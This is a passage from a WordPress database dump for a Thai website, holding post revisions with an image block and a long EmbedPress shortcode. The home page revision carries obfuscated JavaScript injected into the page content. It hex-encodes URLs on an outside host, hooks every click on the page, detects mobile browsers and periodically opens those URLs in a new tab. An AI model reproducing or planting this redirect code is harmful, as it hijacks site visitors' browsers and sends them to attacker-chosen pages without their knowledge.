_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-03 09:47:18','2025-07-03 02:47:18','',14,'http://pakhaeng.ssk.in.th/?p=1636',0,'revision','',0),
(1637,1,'2025-07-03 11:39:08','2025-07-03 04:39:08','<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'519\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' 